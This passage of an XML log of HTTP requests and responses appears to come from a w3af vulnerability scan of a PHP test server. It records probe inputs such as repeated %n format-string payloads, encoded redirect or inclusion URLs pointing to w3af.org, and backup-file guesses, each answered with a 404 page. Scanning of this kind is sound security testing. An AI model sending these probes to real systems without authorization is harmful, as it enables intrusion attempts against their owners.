        The article about a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="319">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="320">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="322">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="323">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="328">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/CAokkELj HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about CAokkELj has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='CAokkELj'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="331">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="334">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="335">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="336">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cake~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cake~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="343">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
